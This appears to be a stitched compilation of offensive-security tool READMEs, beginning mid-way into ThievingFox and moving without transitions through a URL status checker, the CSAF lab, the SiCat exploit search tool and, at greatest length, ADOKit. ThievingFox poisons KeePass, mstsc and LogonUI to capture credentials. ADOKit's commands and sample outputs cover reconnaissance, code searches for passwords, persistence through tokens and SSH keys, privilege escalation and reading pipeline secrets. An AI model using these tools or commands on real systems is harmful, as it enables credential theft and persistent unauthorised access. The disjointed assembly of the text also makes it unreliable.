[--keepass-path KEEPASS_PATH] [--keepassxc] [--keepassxc-path KEEPASSXC_PATH] [--keepassxc-share KEEPASSXC_SHARE] [--mstsc] [--consent] [--logonui]
[--rdcman] [--mobaxterm] [--all]
target
positional arguments:
target Target machine or range [domain/]username[:password]@<IP or FQDN>[/CIDR]
options:
-h, --help show this help message and exit
-hashes HASHES, --hashes HASHES
LM:NT hash
-aesKey AESKEY, --aesKey AESKEY
AES key to use for Kerberos Authentication
-k Use kerberos authentication. For LogonUI, mstsc and consent modules, an anonymous NTLM authentication is performed, to retrieve the OS version.
-dc-ip DC_IP, --dc-ip DC_IP
IP Address of the domain controller
-no-pass, --no-pass Do not prompt for password
--tempdir TEMPDIR The name of the temporary directory to use for DLLs and output (Default: ThievingFox)
--keepass Try to cleanup all poisonning artifacts related to KeePass.exe
--keepass-share KEEPASS_SHARE
The share on which KeePass is installed (Default: c$)
--keepass-path KEEPASS_PATH
The path where KeePass is installed, without the share name (Default: /Program Files/KeePass Password Safe 2/)
--keepassxc Try to cleanup all poisonning artifacts related to KeePassXC.exe
--keepassxc-path KEEPASSXC_PATH
The path where KeePassXC is installed, without the share name (Default: /Program Files/KeePassXC/)
--keepassxc-share KEEPASSXC_SHARE
The share on which KeePassXC is installed (Default: c$)
--mstsc Try to cleanup all poisonning artifacts related to mstsc.exe
--consent Try to cleanup all poisonning artifacts related to Consent.exe
--logonui Try to cleanup all poisonning artifacts related to LogonUI.exe
--rdcman Try to cleanup all poisonning artifacts related to RDCMan.exe
--mobaxterm Try to cleanup all poisonning artifacts related to MobaXTerm.exe
--all Try to cleanup all poisonning artifacts related to all applications
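A matching cleanup pass against the same placeholder host could look like this:
python3 client/ThievingFox.py cleanup --keepass --mstsc 'domain/user:password@192.168.1.10'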
For each application specified in the command line parameters, the collect module retrieves output files on the remote host stored inside C:\Windows\Temp\<tempdir> corresponding to the application, and decrypts them. The files are deleted from the remote host, and retrieved data is stored in client/ouput/.
Multiple applications can be specified at once, or the --all flag can be used to collect logs from all applications.
$ python3 client/ThievingFox.py collect -h
usage: ThievingFox.py collect [-h] [-hashes HASHES] [-aesKey AESKEY] [-k] [-dc-ip DC_IP] [-no-pass] [--tempdir TEMPDIR] [--keepass] [--keepassxc] [--mstsc] [--consent]
[--logonui] [--rdcman] [--mobaxterm] [--all]
target
positional arguments:
target Target machine or range [domain/]username[:password]@<IP or FQDN>[/CIDR]
options:
-h, --help show this help message and exit
-hashes HASHES, --hashes HASHES
LM:NT hash
-aesKey AESKEY, --aesKey AESKEY
AES key to use for Kerberos Authentication
-k Use kerberos authentication. For LogonUI, mstsc and consent modules, an anonymous NTLM authentication is performed, to retrieve the OS version.
-dc-ip DC_IP, --dc-ip DC_IP
IP Address of the domain controller
-no-pass, --no-pass Do not prompt for password
--tempdir TEMPDIR The name of the temporary directory to use for DLLs and output (Default: ThievingFox)
--keepass Collect KeePass.exe logs
--keepassxc Collect KeePassXC.exe logs
--mstsc Collect mstsc.exe logs
--consent Collect Consent.exe logs
--logonui Collect LogonUI.exe logs
--rdcman Collect RDCMan.exe logs
--mobaxterm Collect MobaXTerm.exe logs
--all Collect logs from all applications
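And a hypothetical collection pass, again with placeholder credentials, that retrieves and decrypts logs for every module:
python3 client/ThievingFox.py collect --all 'domain/user:password@192.168.1.10'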
git clone https://github.com/your_username/status-checker.git
cd status-checker
pip install -r requirements.txt
python status_checker.py [-h] [-d DOMAIN] [-l LIST] [-o OUTPUT] [-v] [-update]
-d, --domain: Single domain/URL to check.
-l, --list: File containing a list of domains/URLs to check.
-o, --output: File to save the output.
-v, --version: Display version information.
-update: Update the tool.
Example:
python status_checker.py -l urls.txt -o results.txt
This project is licensed under the MIT License - see the LICENSE file for details.
The Cyber Security Awareness Framework (CSAF) is a structured approach aimed at enhancing cybersecurity awareness and understanding among individuals, organizations, and communities. It provides guidance for the development of effective cybersecurity awareness programs, covering key areas such as assessing awareness needs, creating educational materials, conducting training and simulations, implementing communication campaigns, and measuring awareness levels. By adopting this framework, organizations can foster a robust security culture, enhance their ability to detect and respond to cyber threats, and mitigate the risks associated with attacks and security breaches.
Clone the repository
git clone https://github.com/csalab-id/csaf.git
Navigate to the project directory
cd csaf
Pull the Docker images
docker-compose --profile=all pull
Generate wazuh ssl certificate
docker-compose -f generate-indexer-certs.yml run --rm generator
For security reasons, you should first set environment variables like this:
export ATTACK_PASS=ChangeMePlease
export DEFENSE_PASS=ChangeMePlease
export MONITOR_PASS=ChangeMePlease
export SPLUNK_PASS=ChangeMePlease
export GOPHISH_PASS=ChangeMePlease
export MAIL_PASS=ChangeMePlease
export PURPLEOPS_PASS=ChangeMePlease
Start all the containers
docker-compose --profile=all up -d
You can run specific labs by selecting one of the following profiles: all, attackdefenselab, phisinglab, breachlab, soclab.
For example
docker-compose --profile=attackdefenselab up -d
An exposed port can be accessed using a SOCKS5 proxy client, SSH client, or HTTP client. Choose one for the best experience.
This Docker Compose application is released under the MIT License. See the LICENSE file for details.
SiCat is an advanced exploit search tool designed to identify and gather information about exploits from both open sources and local repositories effectively. With a focus on cybersecurity, SiCat allows users to quickly search online, finding potential vulnerabilities and relevant exploits for ongoing projects or systems.
SiCat's main strength lies in its ability to traverse both online and local resources to collect information about relevant exploitations. This tool aids cybersecurity professionals and researchers in understanding potential security risks, providing valuable insights to enhance system security.
git clone https://github.com/justakazh/sicat.git && cd sicat
pip install -r requirements.txt
~$ python sicat.py --help
Command | Description |
---|---|
-h | Show help message and exit |
-k KEYWORD | |
-kv KEYWORK_VERSION | |
-nm | Identify via nmap output |
--nvd | Use NVD as info source |
--packetstorm | Use PacketStorm as info source |
--exploitdb | Use ExploitDB as info source |
--exploitalert | Use ExploitAlert as info source |
--msfmodule | Use Metasploit as info source |
-o OUTPUT | Path to save output to |
-ot OUTPUT_TYPE | Output file type: json or html |
From keyword
python sicat.py -k telerik --exploitdb --msfmodule
From nmap output
nmap --open -sV localhost -oX nmap_out.xml
python sicat.py -nm nmap_out.xml --packetstorm
I'm aware that perfection is elusive in coding. If you come across any bugs, feel free to contribute by fixing the code or suggesting new features. Your input is always welcomed and valued.
Azure DevOps Services Attack Toolkit - ADOKit is a toolkit that can be used to attack Azure DevOps Services by taking advantage of the available REST API. The tool allows the user to specify an attack module, along with specifying valid credentials (API key or stolen authentication cookie) for the respective Azure DevOps Services instance. The attack modules supported include reconnaissance, privilege escalation and persistence. ADOKit was built in a modular approach, so that new modules can be added in the future by the information security community.
Full details on the techniques used by ADOKit are in the X-Force Red whitepaper.
The below 3rd party libraries are used in this project.
Library | URL | License |
---|---|---|
Fody | https://github.com/Fody/Fody | MIT License |
Newtonsoft.Json | https://github.com/JamesNK/Newtonsoft.Json | MIT License |
Take the below steps to setup Visual Studio in order to compile the project yourself. This requires two .NET libraries that can be installed from the NuGet package manager.
https://api.nuget.org/v3/index.json
Install-Package Costura.Fody -Version 3.3.3
Install-Package Newtonsoft.Json
Below are the authentication options you have with ADOKit when authenticating to an Azure DevOps instance.
UserAuthentication cookie on a user's machine for the .dev.azure.com domain: /credential:UserAuthentication=ABC123
API key: /credential:apiToken
The below table shows the permissions required for each module.
Attack Scenario | Module | Special Permissions? | Notes |
---|---|---|---|
Recon | check | No | |
Recon | whoami | No | |
Recon | listrepo | No | |
Recon | searchrepo | No | |
Recon | listproject | No | |
Recon | searchproject | No | |
Recon | searchcode | No | |
Recon | searchfile | No | |
Recon | listuser | No | |
Recon | searchuser | No | |
Recon | listgroup | No | |
Recon | searchgroup | No | |
Recon | getgroupmembers | No | |
Recon | getpermissions | No | |
Persistence | createpat | No | |
Persistence | listpat | No | |
Persistence | removepat | No | |
Persistence | createsshkey | No | |
Persistence | listsshkey | No | |
Persistence | removesshkey | No | |
Privilege Escalation | addprojectadmin | Yes - Project Administrator, Project Collection Administrator or Project Collection Service Accounts | |
Privilege Escalation | removeprojectadmin | Yes - Project Administrator, Project Collection Administrator or Project Collection Service Accounts | |
Privilege Escalation | addbuildadmin | Yes - Project Administrator, Project Collection Administrator or Project Collection Service Accounts | |
Privilege Escalation | removebuildadmin | Yes - Project Administrator, Project Collection Administrator or Project Collection Service Accounts | |
Privilege Escalation | addcollectionadmin | Yes - Project Collection Administrator or Project Collection Service Accounts | |
Privilege Escalation | removecollectionadmin | Yes - Project Collection Administrator or Project Collection Service Accounts | |
Privilege Escalation | addcollectionbuildadmin | Yes - Project Collection Administrator or Project Collection Service Accounts | |
Privilege Escalation | removecollectionbuildadmin | Yes - Project Collection Administrator or Project Collection Service Accounts | |
Privilege Escalation | addcollectionbuildsvc | Yes - Project Collection Administrator, Project Collection Build Administrators or Project Collection Service Accounts | |
Privilege Escalation | removecollectionbuildsvc | Yes - Project Collection Administrator, Project Collection Build Administrators or Project Collection Service Accounts | |
Privilege Escalation | addcollectionsvc | Yes - Project Collection Administrator or Project Collection Service Accounts | |
Privilege Escalation | removecollectionsvc | Yes - Project Collection Administrator or Project Collection Service Accounts | |
Privilege Escalation | getpipelinevars | Yes - Contributors or Readers or Build Administrators or Project Administrators or Project Team Member or Project Collection Test Service Accounts or Project Collection Build Service Accounts or Project Collection Build Administrators or Project Collection Service Accounts or Project Collection Administrators | |
Privilege Escalation | getpipelinesecrets | Yes - Contributors or Readers or Build Administrators or Project Administrators or Project Team Member or Project Collection Test Service Accounts or Project Collection Build Service Accounts or Project Collection Build Administrators or Project Collection Service Accounts or Project Collection Administrators | |
Privilege Escalation | getserviceconnections | Yes - Project Administrator, Project Collection Administrator or Project Collection Service Accounts |
Perform authentication check to ensure that organization is using Azure DevOps and that provided credentials are valid.
Provide the check module, along with any relevant authentication information and URL. This will output whether the organization provided is using Azure DevOps, and if so, will attempt to validate the credentials provided.
ADOKit.exe check /credential:apiKey /url:https://dev.azure.com/organizationName
ADOKit.exe check /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName
C:\>ADOKit.exe check /credential:apiKey /url:https://dev.azure.com/YourOrganization
==================================================
Module: check
Auth Type: API Key
Search Term:
Target URL: https://dev.azure.com/YourOrganization
Timestamp: 3/28/2023 3:33:01 PM
==================================================
[*] INFO: Checking if organization provided uses Azure DevOps
[+] SUCCESS: Organization provided exists in Azure DevOps
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
3/28/23 19:33:02 Finished execution of check
Get the current user and the user's group memberships.
Provide the whoami module, along with any relevant authentication information and URL. This will output the current user and all of its group memberships.
ADOKit.exe whoami /credential:apiKey /url:https://dev.azure.com/organizationName
ADOKit.exe whoami /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName
C:\>ADOKit.exe whoami /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization
==================================================
Module: whoami
Auth Type: Cookie
Search Term:
Target URL: https://dev.azure.com/YourOrganization
Timestamp: 4/4/2023 11:33:12 AM
==================================================
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
Username | Display Name | UPN
------------------------------------------------------------------------------------------------------------------------------------------------------------
jsmith | John Smith | jsmith@YourOrganization.onmicrosoft.com
[*] INFO: Listing group memberships for the current user
Group UPN | Display Name | Description
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
[YourOrganization]\Project Collection Test Service Accounts | Project Collection Test Service Accounts | Members of this group should include the service accounts used by the test controllers set up for this project collection.
[TestProject2]\Contributors | Contributors | Members of this group can add, modify, and delete items within the team project.
[MaraudersMap]\Contributors | Contributors | Members of this group can add, modify, and delete items within the team project.
[YourOrganization]\Project Collection Administrators | Project Collection Administrators | Members of this application group can perform all privileged operations on the Team Project Collection.
4/4/23 15:33:19 Finished execution of whoami
Discover repositories being used in Azure DevOps instance
Provide the listrepo module, along with any relevant authentication information and URL. This will output the repository name and URL.
ADOKit.exe listrepo /credential:apiKey /url:https://dev.azure.com/organizationName
ADOKit.exe listrepo /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName
C:\>ADOKit.exe listrepo /credential:UserAuthentication=ABC123 /url:https://dev.azure.com/YourOrganization
==================================================
Module: listrepo
Auth Type: Cookie
Search Term:
Target URL: https://dev.azure.com/YourOrganization
Timestamp: 3/29/2023 8:41:50 AM
==================================================
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
Name | URL
-----------------------------------------------------------------------------------
TestProject2 | https://dev.azure.com/YourOrganization/TestProject2/_git/TestProject2
MaraudersMap | https://dev.azure.com/YourOrganization/MaraudersMap/_git/MaraudersMap
SomeOtherRepo | https://dev.azure.com/YourOrganization/ProjectWithMultipleRepos/_git/SomeOtherRepo
AnotherRepo | https://dev.azure.com/YourOrganization/ProjectWithMultipleRepos/_git/AnotherRepo
ProjectWithMultipleRepos | https://dev.azure.com/YourOrganization/ProjectWithMultipleRepos/_git/ProjectWithMultipleRepos
TestProject | https://dev.azure.com/YourOrganization/TestProject/_git/TestProject
3/29/23 12:41:53 Finished execution of listrepo
Search for repositories by repository name in Azure DevOps instance
Provide the searchrepo module and your search criteria in the /search: command-line argument, along with any relevant authentication information and URL. This will output the matching repository name and URL.
ADOKit.exe searchrepo /credential:apiKey /url:https://dev.azure.com/organizationName /search:cred
ADOKit.exe searchrepo /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /search:cred
C:\>ADOKit.exe searchrepo /credential:apiKey /url:https://dev.azure.com/YourOrganization /search:"test"
==================================================
Module: searchrepo
Auth Type: API Key
Search Term: test
Target URL: https://dev.azure.com/YourOrganization
Timestamp: 3/29/2023 9:26:57 AM
==================================================
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
Name | URL
-----------------------------------------------------------------------------------
TestProject2 | https://dev.azure.com/YourOrganization/TestProject2/_git/TestProject2
TestProject | https://dev.azure.com/YourOrganization/TestProject/_git/TestProject
3/29/23 13:26:59 Finished execution of searchrepo
Discover projects being used in Azure DevOps instance
Provide the listproject module, along with any relevant authentication information and URL. This will output the project name, visibility (public or private) and URL.
ADOKit.exe listproject /credential:apiKey /url:https://dev.azure.com/organizationName
ADOKit.exe listproject /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName
C:\>ADOKit.exe listproject /credential:apiKey /url:https://dev.azure.com/YourOrganization
==================================================
Module: listproject
Auth Type: API Key
Search Term:
Target URL: https://dev.azure.com/YourOrganization
Timestamp: 4/4/2023 7:44:59 AM
==================================================
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
Name | Visibility | URL
-----------------------------------------------------------------------------------------------------
TestProject2 | private | https://dev.azure.com/YourOrganization/TestProject2
MaraudersMap | private | https://dev.azure.com/YourOrganization/MaraudersMap
ProjectWithMultipleRepos | private | https://dev.azure.com/YourOrganization/ProjectWithMultipleRepos
TestProject | private | https://dev.azure.com/YourOrganization/TestProject
4/4/23 11:45:04 Finished execution of listproject
Search for projects by project name in Azure DevOps instance
Provide the searchproject module and your search criteria in the /search: command-line argument, along with any relevant authentication information and URL. This will output the matching project name, visibility (public or private) and URL.
ADOKit.exe searchproject /credential:apiKey /url:https://dev.azure.com/organizationName /search:cred
ADOKit.exe searchproject /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /search:cred
C:\>ADOKit.exe searchproject /credential:apiKey /url:https://dev.azure.com/YourOrganization /search:"map"
==================================================
Module: searchproject
Auth Type: API Key
Search Term: map
Target URL: https://dev.azure.com/YourOrganization
Timestamp: 4/4/2023 7:45:30 AM
==================================================
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
Name | Visibility | URL
-----------------------------------------------------------------------------------------------------
MaraudersMap | private | https://dev.azure.com/YourOrganization/MaraudersMap
4/4/23 11:45:31 Finished execution of searchproject
Search for code containing a given keyword in Azure DevOps instance
Provide the searchcode module and your search criteria in the /search: command-line argument, along with any relevant authentication information and URL. This will output the URL to the matching code file, along with the line in the code that matched.
ADOKit.exe searchcode /credential:apiKey /url:https://dev.azure.com/organizationName /search:password
ADOKit.exe searchcode /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /search:password
C:\>ADOKit.exe searchcode /credential:UserAuthentication=ABC123 /url:https://dev.azure.com/YourOrganization /search:"password"
==================================================
Module: searchcode
Auth Type: Cookie
Search Term: password
Target URL: https://dev.azure.com/YourOrganization
Timestamp: 3/29/2023 3:22:21 PM
==================================================
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
[>] URL: https://dev.azure.com/YourOrganization/MaraudersMap/_git/MaraudersMap?path=/Test.cs
|_ Console.WriteLine("PassWord");
|_ this is some text that has a password in it
[>] URL: https://dev.azure.com/YourOrganization/TestProject2/_git/TestProject2?path=/Program.cs
|_ Console.WriteLine("PaSsWoRd");
[*] Match count : 3
3/29/23 19:22:22 Finished execution of searchcode
Search for files in repositories containing a given keyword in the file name in Azure DevOps
Provide the searchfile module and your search criteria in the /search: command-line argument, along with any relevant authentication information and URL. This will output the URL to the matching file in its respective repository.
ADOKit.exe searchfile /credential:apiKey /url:https://dev.azure.com/organizationName /search:azure-pipeline
ADOKit.exe searchfile /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /search:azure-pipeline
C:\>ADOKit.exe searchfile /credential:UserAuthentication=ABC123 /url:https://dev.azure.com/YourOrganization /search:"test"
==================================================
Module: searchfile
Auth Type: Cookie
Search Term: test
Target URL: https://dev.azure.com/YourOrganization
Timestamp: 3/29/2023 11:28:34 AM
==================================================
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
File URL
----------------------------------------------------------------------------------------------------
https://dev.azure.com/YourOrganization/MaraudersMap/_git/4f159a8e-5425-4cb5-8d98-31e8ac86c4fa?path=/Test.cs
https://dev.azure.com/YourOrganization/ProjectWithMultipleRepos/_git/c1ba578c-1ce1-46ab-8827-f245f54934e9?path=/Test.cs
https://dev.azure.com/YourOrganization/TestProject/_git/fbcf0d6d-3973-4565-b641-3b1b897cfa86?path=/test.cs
3/29/23 15:28:37 Finished execution of searchfile
Create a personal access token (PAT) for a user that can be used for persistence to an Azure DevOps instance.
Provide the createpat module, along with any relevant authentication information and URL. This will output the PAT ID, name, scope, date valid until, and token content for the PAT created. The name of the PAT created will be ADOKit- followed by a random string of 8 characters. The date the PAT is valid until will be 1 year from the date of creation, as that is the maximum that Azure DevOps allows.
ADOKit.exe createpat /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName
C:\>ADOKit.exe createpat /credential:UserAuthentication=ABC123 /url:https://dev.azure.com/YourOrganization
==================================================
Module: createpat
Auth Type: Cookie
Search Term:
Target URL: https://dev.azure.com/YourOrganization
Timestamp: 3/31/2023 2:33:09 PM
==================================================
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
PAT ID | Name | Scope | Valid Until | Token Value
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
8776252f-9e03-48ea-a85c-f880cc830898 | ADOKit-rJxzpZwZ | app_token | 3/31/2024 12:00:00 AM | tokenValueWouldBeHere
3/31/23 18:33:10 Finished execution of createpat
List all personal access tokens (PAT's) for a given user in an Azure DevOps instance.
Provide the listpat module, along with any relevant authentication information and URL. This will output the PAT ID, name, scope, and date valid until for all active PATs for the user.
ADOKit.exe listpat /credential:apiKey /url:https://dev.azure.com/organizationName
ADOKit.exe listpat /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName
C:\>ADOKit.exe listpat /credential:UserAuthentication=ABC123 /url:https://dev.azure.com/YourOrganization
==================================================
Module: listpat
Auth Type: Cookie
Search Term:
Target URL: https://dev.azure.com/YourOrganization
Timestamp: 3/31/2023 2:33:17 PM
==================================================
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
PAT ID | Name | Scope | Valid Until
-------------------------------------------------------------------------------------------------------------------------------------------
9b354668-4424-4505-a35f-d0989034da18 | test-token | app_token | 4/29/2023 1:20:45 PM
8776252f-9e03-48ea-a85c-f880cc830898 | ADOKit-rJxzpZwZ | app_token | 3/31/2024 12:00:00 AM
3/31/23 18:33:18 Finished execution of listpat
Remove a PAT for a given user in an Azure DevOps instance.
Provide the removepat
module, along with any relevant authentication information and URL. Additionally, provide the ID for the PAT in the /id:
argument. This will output whether the PAT was removed or not, and then will list the currently active PATs for the user after performing the removal.
ADOKit.exe removepat /credential:apiKey /url:https://dev.azure.com/organizationName /id:000-000-0000...
ADOKit.exe removepat /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /id:000-000-0000...
C:\>ADOKit.exe removepat /credential:UserAuthentication=ABC123 /url:https://dev.azure.com/YourOrganization /id:0b20ac58-fc65-4b66-91fe-4ff909df7298
==================================================
Module: removepat
Auth Type: Cookie
Search Term:
Target URL: https://dev.azure.com/YourOrganization
Timestamp: 4/3/2023 11:04:59 AM
==================================================
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
[+] SUCCESS: PAT with ID 0b20ac58-fc65-4b66-91fe-4ff909df7298 was removed successfully.
PAT ID | Name | Scope | Valid Until
-------------------------------------------------------------------------------------------------------------------------------------------
9b354668-4424-4505-a35f-d0989034da18 | test-token | app_token | 4/29/2023 1:20:45 PM
4/3/23 15:05:00 Finished execution of removepat
Create an SSH key for a user that can be used for persistence to an Azure DevOps instance.
Provide the createsshkey
module, along with any relevant authentication information and URL. Additionally, provide your public SSH key in the /sshkey:
argument. This will output the SSH key ID, name, scope, date valid until, and last 20 characters of the public SSH key for the SSH key created. The name of the SSH key created will be ADOKit-
followed by a random string of 8 characters. The date the SSH key is valid until will be 1 year from the date of creation, as that is the maximum that Azure DevOps allows.
ADOKit.exe createsshkey /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /sshkey:"ssh-rsa ABC123"
C:\>ADOKit.exe createsshkey /credential:UserAuthentication=ABC123 /url:https://dev.azure.com/YourOrganization /sshkey:"ssh-rsa ABC123"
==================================================
Module: createsshkey
Auth Type: Cookie
Search Term:
Target URL: https://dev.azure.com/YourOrganization
Timestamp: 4/3/2023 2:51:22 PM
==================================================
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
SSH Key ID | Name | Scope | Valid Until | Public SSH Key
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------
fbde9f3e-bbe3-4442-befb-c2ddeab75c58 | ADOKit-iCBfYfFR | app_token | 4/3/2024 12:00:00 AM | ...hOLNYMk5LkbLRMG36RE=
4/3/23 18:51:24 Finished execution of createsshkey
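The /sshkey: argument only needs the public half of a key pair in OpenSSH format. A minimal way to generate one in Python is shown below (a hedged sketch using the third-party cryptography package; a key pair produced with ssh-keygen works just as well):

```python
# Hedged sketch using the third-party "cryptography" package; any key pair
# generated with ssh-keygen works just as well. Only the public half is
# supplied to ADOKit through the /sshkey: argument.
from pathlib import Path
from cryptography.hazmat.primitives import serialization
from cryptography.hazmat.primitives.asymmetric import rsa

private_key = rsa.generate_private_key(public_exponent=65537, key_size=3072)

# Keep the private half locally for later SSH/Git access as the target user.
Path("adokit_id_rsa").write_bytes(
    private_key.private_bytes(
        serialization.Encoding.PEM,
        serialization.PrivateFormat.OpenSSH,
        serialization.NoEncryption(),
    )
)

# The public half, in OpenSSH format, is what goes into /sshkey:"ssh-rsa ...".
print(
    private_key.public_key()
    .public_bytes(serialization.Encoding.OpenSSH, serialization.PublicFormat.OpenSSH)
    .decode()
)
```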
List all public SSH keys for a given user in an Azure DevOps instance.
Provide the listsshkey
module, along with any relevant authentication information and URL. This will output the SSH Key ID, name, scope, and date valid until for all active SSH keys for the user. Additionally, it will print the last 20 characters of the public SSH key.
ADOKit.exe listsshkey /credential:apiKey /url:https://dev.azure.com/organizationName
ADOKit.exe listsshkey /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName
C:\>ADOKit.exe listsshkey /credential:UserAuthentication=ABC123 /url:https://dev.azure.com/YourOrganization
==================================================
Module: listsshkey
Auth Type: Cookie
Search Term:
Target URL: https://dev.azure.com/YourOrganization
Timestamp: 4/3/2023 11:37:10 AM
==================================================
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
SSH Key ID | Name | Scope | Valid Until | Public SSH Key
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------
ec056907-9370-4aab-b78c-d642d551eb98 | test-ssh-key | app_token | 4/3/2024 3:13:58 PM | ...nDoYAPisc/pEFArVVV0=
4/3/23 15:37:11 Finished execution of listsshkey
Remove an SSH key for a given user in an Azure DevOps instance.
Provide the removesshkey
module, along with any relevant authentication information and URL. Additionally, provide the ID for the SSH key in the /id:
argument. This will output whether the SSH key was removed or not, and then will list the currently active SSH keys for the user after performing the removal.
ADOKit.exe removesshkey /credential:apiKey /url:https://dev.azure.com/organizationName /id:000-000-0000...
ADOKit.exe removesshkey /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /id:000-000-0000...
C:\>ADOKit.exe removesshkey /credential:UserAuthentication=ABC123 /url:https://dev.azure.com/YourOrganization /id:a199c036-d7ed-4848-aae8-2397470aff97
==================================================
Module: removesshkey
Auth Type: Cookie
Search Term:
Target URL: https://dev.azure.com/YourOrganization
Timestamp: 4/3/2023 1:50:08 PM
==================================================
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
[+] SUCCESS: SSH key with ID a199c036-d7ed-4848-aae8-2397470aff97 was removed successfully.
SSH Key ID | Name | Scope | Valid Until | Public SSH Key
---------------------------------------------------------------------------------------------------------------------------------------------- -------------------------
ec056907-9370-4aab-b78c-d642d551eb98 | test-ssh-key | app_token | 4/3/2024 3:13:58 PM | ...nDoYAPisc/pEFArVVV0=
4/3/23 17:50:09 Finished execution of removesshkey
List users within an Azure DevOps instance
Provide the listuser
module, along with any relevant authentication information and URL. This will output the username, display name and user principal name.
ADOKit.exe listuser /credential:apiKey /url:https://dev.azure.com/organizationName
ADOKit.exe listuser /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName
C:\>ADOKit.exe listuser /credential:apiKey /url:https://dev.azure.com/YourOrganization
==================================================
Module: listuser
Auth Type: API Key
Search Term:
Target URL: https://dev.azure.com/YourOrganization
Timestamp: 4/3/2023 4:12:07 PM
==================================================
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
Username | Display Name | UPN
------------------------------------------------------------------------------------------------------------------------------------------------------------
user1 | User 1 | user1@YourOrganization.onmicrosoft.com
jsmith | John Smith | jsmith@YourOrganization.onmicrosoft.com
rsmith | Ron Smith | rsmith@YourOrganization.onmicrosoft.com
user2 | User 2 | user2@YourOrganization.onmicrosoft.com
4/3/23 20:12:08 Finished execution of listuser
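For comparison, the documented Azure DevOps Graph REST API exposes the same user listing. The sketch below is a hypothetical illustration, not ADOKit's implementation; it assumes the requests package, a PAT passed over Basic auth, and endpoint/field names from the public API reference:

```python
# Hypothetical illustration only -- not ADOKit's implementation. Assumptions:
# the "requests" package is installed and the PAT has permission to read the
# organization's Graph data.
import requests

ORGANIZATION = "YourOrganization"  # assumption: replace with the target org
PAT = "your-pat-here"              # assumption: PAT used over Basic auth

url = (f"https://vssps.dev.azure.com/{ORGANIZATION}"
       "/_apis/graph/users?api-version=7.1-preview.1")
response = requests.get(url, auth=("", PAT), timeout=30)
response.raise_for_status()

for user in response.json().get("value", []):
    # Field names follow the public Graph API reference for the user entity.
    print(user.get("principalName"), "|", user.get("displayName"), "|", user.get("mailAddress"))
```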
Search for given user(s) in Azure DevOps instance
Provide the searchuser
module and your search criteria in the /search:
command-line argument, along with any relevant authentication information and URL. This will output the matching username, display name and user principal name.
ADOKit.exe searchuser /credential:apiKey /url:https://dev.azure.com/organizationName /search:user
ADOKit.exe searchuser /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /search:user
C:\>ADOKit.exe searchuser /credential:apiKey /url:https://dev.azure.com/YourOrganization /search:"user"
==================================================
Module: searchuser
Auth Type: API Key
Search Term:
Target URL: https://dev.azure.com/YourOrganization
Timestamp: 4/3/2023 4:12:23 PM
==================================================
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
Username | Display Name | UPN
------------------------------------------------------------------------------------------------------------------------------------------------------------
user1 | User 1 | user1@YourOrganization.onmicrosoft.com
user2 | User 2 | user2@YourOrganization.onmicrosoft.com
4/3/23 20:12:24 Finished execution of searchuser
List groups within an Azure DevOps instance
Provide the listgroup
module, along with any relevant authentication information and URL. This will output the user principal name, display name and description of each group.
ADOKit.exe listgroup /credential:apiKey /url:https://dev.azure.com/organizationName
ADOKit.exe listgroup /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName
C:\>ADOKit.exe listgroup /credential:apiKey /url:https://dev.azure.com/YourOrganization
==================================================
Module: listgroup
Auth Type: API Key
Search Term:
Target URL: https://dev.azure.com/YourOrganization
Timestamp: 4/3/2023 4:48:45 PM
==================================================
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
UPN | Display Name | Description
------------------------------------------------------------------------------------------------------------------------------------------------------------
[TestProject]\Contributors | Contributors | Members of this group can add, modify, and delete items within the team project.
[TestProject2]\Build Administrators | Build Administrators | Members of this group can create, modify and delete build definitions and manage queued and completed builds.
[YourOrganization]\Project-Scoped Users | Project-Scoped Users | Members of this group will have limited visibility to organization-level data
[ProjectWithMultipleRepos]\Build Administrators | Build Administrators | Members of this group can create, modify and delete build definitions and manage queued and completed builds.
[MaraudersMap]\Readers | Readers | Members of this group have access to the team project.
[YourOrganization]\Project Collection Test Service Accounts | Project Collection Test Service Accounts | Members of this group should include the service accounts used by the test controllers set up for this project collection.
[MaraudersMap]\MaraudersMap Team | MaraudersMap Team | The default project team.
[TEAM FOUNDATION]\Enterprise Service Accounts | Enterprise Service Accounts | Members of this group have service-level permissions in this enterprise. For service accounts only.
